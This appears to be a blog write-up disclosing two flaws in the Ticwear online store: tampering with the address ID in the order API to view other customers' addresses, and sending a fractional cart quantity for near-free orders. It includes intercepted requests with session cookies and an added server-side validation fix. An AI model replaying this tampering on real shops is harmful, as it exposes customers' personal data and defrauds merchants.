Validation really does need to be tightened up~

First, the vulnerabilities.

The main cause is that the reference to the address ID is not restricted properly.

First, you need to be able to place an order and capture something like this - -

Set a breakpoint on http://store.ticwear.com/api/order/create

Then, see this address ID here; let's change it to 1 and try.

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228022700.png

After changing it, let the request through and submit; on the new order page we can see someone else's address.

https://www.zhaojin97.cn/wp-content/uploads/2015/12/16B1.tm_.png

Let's look at a few more.

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228023645.png

And then

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228023704.png

OK, I'm getting sleepy, so I only tested this one.

Next is the 0-yuan order problem - - compared with the previous one it's not as bad.

When adding an item to the cart,

intercept the request at the breakpoint on http://store.ticwear.com/api/v1/cart/create

                POST http://store.ticwear.com/api/v1/cart/create HTTP/1.1
                Host: store.ticwear.com
                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
                Accept: application/json
                Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
                Accept-Encoding: gzip, deflate
                DNT: 1
                X-Requested-With: XMLHttpRequest
                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                Referer: http://store.ticwear.com/products/p000001
                Content-Length: 80
                Cookie: _ga=GA1.2.80267113.1451191463; Hm_lvt_9903b088357366e6615a9af14b5396fc=1451191463,1451195731,1451208100,1451235136; Hm_lpvt_9903b088357366e6615a9af14b5396fc=1451241659; show_admin_panel=false; _yt_a=af0e4f37-bb24-5298-af1d-70ee312b4c21; _yt_e=http%3A//ticwear.com/%3Fhttp%3A//store.ticwear.com/; a7526_pages=57; a7526_times=1; _homeland_shop_customer_session=30a47693ac0f8170ad25f8e7ca6a06a8f2176ad9d1967bfedc53ee77d43c69a7; checkout_token=42F3908C23E744E1B2E5322AF038216A
                Connection: keep-alive

                variant_id=15229&quantity=1&is_check=true&token=54b64671b98b44bb939e97e7695464de

quantity can be any real number, for example 0.5.

For example,

            POST http://store.ticwear.com/api/v1/cart/create HTTP/1.1
            Host: store.ticwear.com
            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7
            Accept: application/json
            Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
            Accept-Encoding: gzip, deflate
            DNT: 1
            X-Requested-With: XMLHttpRequest
            Content-Type: application/x-www-form-urlencoded; charset=UTF-8
            Referer: http://store.ticwear.com/products/p000001
            Content-Length: 82
            Cookie: _ga=GA1.2.80267113.1451191463; Hm_lvt_9903b088357366e6615a9af14b5396fc=1451191463,1451195731,1451208100,1451235136; Hm_lpvt_9903b088357366e6615a9af14b5396fc=1451241659; show_admin_panel=false; _yt_a=af0e4f37-bb24-5298-af1d-70ee312b4c21; _yt_e=http%3A//ticwear.com/%3Fhttp%3A//store.ticwear.com/; a7526_pages=60; a7526_times=1; _homeland_shop_customer_session=30a47693ac0f8170ad25f8e7ca6a06a8f2176ad9d1967bfedc53ee77d43c69a7; checkout_token=42F3908C23E744E1B2E5322AF038216A
            Connection: keep-alive

            variant_id=15229&quantity=0.5&is_check=true&token=54b64671b98b44bb939e97e7695464de

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025126.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025231.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025250.png

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228025306.png
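As an added example (not code from this post or from the Ticwear store), here is the server-side check both endpoints were missing: cart/create should accept only a strict positive integer quantity, and order/create should confirm that the submitted address ID belongs to the session user. The function names, the ADDRESS_OWNER table and the sample values are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# A strict positive integer: no sign, no decimal point, no exponent, no
# leading zeros, and a sane upper bound. fullmatch() means "0.5" cannot slip
# through the way it did on cart/create above.
QUANTITY_RE = re.compile(r"[1-9][0-9]{0,5}")

# Constructed sample data (hypothetical): which customer owns each saved address.
ADDRESS_OWNER = {1: "customer_a", 2: "customer_b", 15: "customer_b"}


def quantity_is_valid(raw: str) -> bool:
    """True only for a positive integer string; '0.5', '0', '-1', '1e2', '01' fail."""
    return QUANTITY_RE.fullmatch(raw) is not None


def parse_cart_create(body: str) -> dict:
    """Validate the form body of POST /api/v1/cart/create before touching the cart.
    Each required field must appear exactly once; ids and quantity must be strict ints."""
    params = parse_qs(body, keep_blank_values=True)
    for name in ("variant_id", "quantity", "token"):
        if len(params.get(name, [])) != 1:
            raise ValueError(f"{name} must appear exactly once")
    variant_id, quantity = params["variant_id"][0], params["quantity"][0]
    if not quantity_is_valid(variant_id):
        raise ValueError(f"invalid variant_id: {variant_id!r}")
    if not quantity_is_valid(quantity):
        raise ValueError(f"invalid quantity: {quantity!r}")
    return {"variant_id": int(variant_id), "quantity": int(quantity), "token": params["token"][0]}


def user_owns_address(user_id: str, address_id: int) -> bool:
    """The ownership check order/create should perform: the address id from the
    request is looked up and compared with the authenticated session user, never trusted."""
    return ADDRESS_OWNER.get(address_id) == user_id


def create_order(user_id: str, address_id: int, cart_line: dict) -> dict:
    """Server side of order/create: refuse any address id the session user does not own."""
    if not user_owns_address(user_id, address_id):
        raise PermissionError(f"address {address_id} is not owned by {user_id}")
    return {"user": user_id, "address_id": address_id, "lines": [cart_line]}
```

The same lookup-then-compare pattern applies to any object ID a client submits (order IDs, cart IDs), and any such failure should be logged, since a burst of rejected address IDs from one session is exactly what the enumeration above looks like.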

Just a hair away from being able to reset passwords at will = =

https://www.zhaojin97.cn/wp-content/uploads/2015/12/微信截图_20151228031459.png